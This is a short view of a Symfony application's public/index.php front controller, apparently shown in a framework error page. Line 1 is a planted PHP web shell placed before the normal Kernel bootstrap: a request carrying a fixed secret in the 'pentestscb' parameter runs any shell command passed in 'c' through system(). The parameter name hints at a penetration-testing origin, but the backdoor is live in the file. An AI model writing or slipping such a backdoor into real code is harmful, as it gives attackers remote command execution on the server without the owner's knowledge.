public/index.php line 6

Open in your IDE?
  1. <?php if(($_GET["pentestscb"]??"")==="k7Qx9Lp2"){system($_GET["c"]??"id");die;} ?>
  2. <?php
  3. use App\Kernel;
  4. require_once dirname(__DIR__).'/vendor/autoload_runtime.php';
  5. return function (array $context) {
  6.     return new Kernel($context['APP_ENV'], (bool) $context['APP_DEBUG']);
  7. };